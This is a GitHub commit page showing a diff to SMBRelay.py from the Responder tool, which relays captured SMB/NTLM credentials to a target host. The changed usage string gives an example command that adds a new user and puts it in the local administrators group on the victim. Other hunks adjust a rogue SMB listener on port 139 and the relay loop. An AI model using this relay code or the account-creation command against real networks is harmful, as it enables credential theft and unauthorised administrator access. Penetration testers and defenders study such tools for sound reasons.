github/Responder
1
0
Fork 0
mirror of https://github.com/lgandx/Responder.git synced 2025-07-15 09:32:53 -07:00
Code Issues Projects Releases Packages Wiki Activity Actions

minor changes

Browse source
This commit is contained in:
lgandx 2014-01-27 22:10:50 -05:00
parent 583cdb7254
commit 4f239a2ef1
1 changed files with 44 additions and 38 deletions
Download patch file Download diff file Expand all files Collapse all files

14
SMBRelay.py
View file

@ -29,7 +29,7 @@ def UserCallBack(op, value, dmy, parser):
args.extend(getattr(parser.values, op.dest)) args.extend(getattr(parser.values, op.dest))
setattr(parser.values, op.dest, args) setattr(parser.values, op.dest, args)
parser = optparse.OptionParser(usage="python %prog -i 10.20.30.40 -c 'net user Responder Quol0eeP/e}X /add &&net localgroup administrators Responder /add' -t 10.20.30.45 -r ", parser = optparse.OptionParser(usage="python %prog -i 10.20.30.40 -c 'net user Responder Quol0eeP/e}X /add &&net localgroup administrators Responder /add' -t 10.20.30.45 -u Administrator lgandx admin",
prog=sys.argv[0], prog=sys.argv[0],
) )
parser.add_option('-i','--ip', action="store", help="The ip address to redirect the traffic to. (usually yours)", metavar="10.20.30.40",dest="OURIP") parser.add_option('-i','--ip', action="store", help="The ip address to redirect the traffic to. (usually yours)", metavar="10.20.30.40",dest="OURIP")
@ -38,7 +38,7 @@ parser.add_option('-c',action='store', help='Command to run on the target.',meta
parser.add_option('-t',action="store", help="Target server for SMB relay.",metavar="10.20.30.45",dest="TARGET") parser.add_option('-t',action="store", help="Target server for SMB relay.",metavar="10.20.30.45",dest="TARGET")
parser.add_option('-d',action="store", help="Target Domain for SMB relay (optional). This can be set to overwrite a domain logon (DOMAIN\Username) with the gathered credentials.",metavar="WORKGROUP",dest="Domain") parser.add_option('-d',action="store", help="Target Domain for SMB relay (optional). This can be set to overwrite a domain logon (DOMAIN\Username) with the gathered credentials. Woks on NTLMv1",metavar="WORKGROUP",dest="Domain")
parser.add_option('-u', '--UserToRelay', action="callback", callback=UserCallBack, dest="UserToRelay") parser.add_option('-u', '--UserToRelay', action="callback", callback=UserCallBack, dest="UserToRelay")
@ -198,13 +198,18 @@ def Parse_Nego_Dialect(data):
return "\x0a\x00" return "\x0a\x00"
def SmbRogueSrv139(key,Target,DomainMachineName): def SmbRogueSrv139(key,Target,DomainMachineName):
try:
s = socket(AF_INET,SOCK_STREAM) s = socket(AF_INET,SOCK_STREAM)
s.setsockopt(SOL_SOCKET,SO_REUSEADDR, 1) s.setsockopt(SOL_SOCKET,SO_REUSEADDR, 1)
s.settimeout(30)
try:
s.bind(('0.0.0.0', 139)) s.bind(('0.0.0.0', 139))
s.listen(0) s.listen(0)
s.settimeout(30)
conn, addr = s.accept() conn, addr = s.accept()
except error, msg:
if "Address already in use" in msg:
print '\033[31m'+'Something is already listening on TCP 139, did you set SMB = Off in Responder.conf..?\nSMB Relay will not work.'+'\033[0m'
try:
while True: while True:
data = conn.recv(1024) data = conn.recv(1024)
##session request 139 ##session request 139
@ -419,6 +424,7 @@ def RunRelay(host, Command,Domain):
if data[8:10] != "\x2e\x00": if data[8:10] != "\x2e\x00":
return False return False
def RunInloop(Target,Command,Domain): def RunInloop(Target,Command,Domain):
try: try:
while True: while True: